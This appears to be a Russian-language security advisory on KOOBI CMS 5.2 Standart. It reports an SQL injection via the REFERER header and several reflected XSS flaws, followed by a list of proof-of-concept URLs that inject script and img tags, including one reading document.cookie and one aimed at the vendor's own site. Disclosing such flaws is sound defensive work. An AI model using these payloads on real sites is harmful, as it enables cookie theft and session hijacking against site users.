Программа: KOOBI CMS 5.2 Standart
Уязвимость позволяет удаленному пользователю произвести XSS нападении и
выполнить произвольные SQL команды в базе данных приложения.
1. Уязвимость существует из-за недостаточной обработки входных данных в
параметре REFERER в сценарии index.php. Удаленный пользователь может с помощью
специально сформированного запроса выполнить произвольные SQL команды в базе
данных приложения.
2. Уязвимость существует из-за недостаточной обработки входных данных в
различных параметрах. Удаленный пользователь может с помощью специально
сформированного запроса выполнить произвольный код сценарий в браузере жертвы в
контексте безопасности уязвимого сайта.
Примеры:
http://KOOIBI_SITE/admin/stats.php?pp=5&sort=id&order=DESC&action=referer& page=2<img%20src=http://ghc.ru/images/rstghc.gif>
http://KOOBI_SITE/index.php?charakter=&type=&p=articles&area=1&categ=2&ud=&selby=&show=&
pp=15%22%3E%3Cimg%20src=http://ghc.ru/images/rstghc.gif%3E%3C%22&page=3
http://site/index.php?pp=73025"><script>alert()</script><& sort=name&categ=1&parent=0&p=links&area=1
http://site/index.php?pp=&sort=name&categ=1&parent=23678">< script>alert(document.cookie)</script><&p=links&area=1
http://site/index.php?p=forum&action=print&what=posting&id=56480">< script>alert()</script><&area=1
http://site/index.php?p=forum&action=print&what=posting&id=24515">< script>alert()</script><&area=1&print=1
http://site/index.php?p=showtopic&toid=2&fid=76126">< script>alert()</script>&area=1
http://site/index.php?showlink=1&fid=25265">< script>alert()</script>&p=links&area=1&categ=1&
koobi=4f6d4236d06ed22c1f66ee363b3899b0
http://site/index.php?showlink=1&fid=2&p=links&area=1&categ=1">< script>alert()</script>2&koobi=4f6d4236d06ed22c1f66ee363b3899b0
http://site/index.php?categ=1&parent=85659">< script>alert()</script><"77798&p=links&area=1
http://koobi.com/index.php?categ=1&parent=49797">< script>alert()</script><"97048&p=links&area=1&print=1
